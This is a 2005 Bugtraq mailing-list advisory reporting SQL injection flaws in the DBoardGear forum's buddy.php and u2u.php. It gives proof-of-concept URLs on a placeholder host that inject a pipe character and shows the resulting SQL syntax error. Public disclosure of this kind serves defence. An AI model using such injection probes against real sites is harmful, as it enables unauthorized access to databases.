Bugtraq mailing list archives

DBoardGear SQL Injection


From: almaster () hotmail com
Date: 24 Oct 2005 13:49:32 -0000

DboardGear ..
Search By Google :-
by DboardGear

Gr33tz :-
         aLMaSTeR HaCKeR .. SQL Injection's FOunder   - | almaster () hotmail com|-
         Security4Arab .. A'Where Home .. 

1- SQL Injection in buddy.php
http://www.site.com/dboard/buddy.php?action=add&buddy=|aLMaSTeR

2-SQL Injection in u2a.php
http://www.site.com/dboard/u2u.php?action=view&u2uid=|aLMaSTeR

Error:
You have an error in your SQL syntax near '' at line 1


Current thread: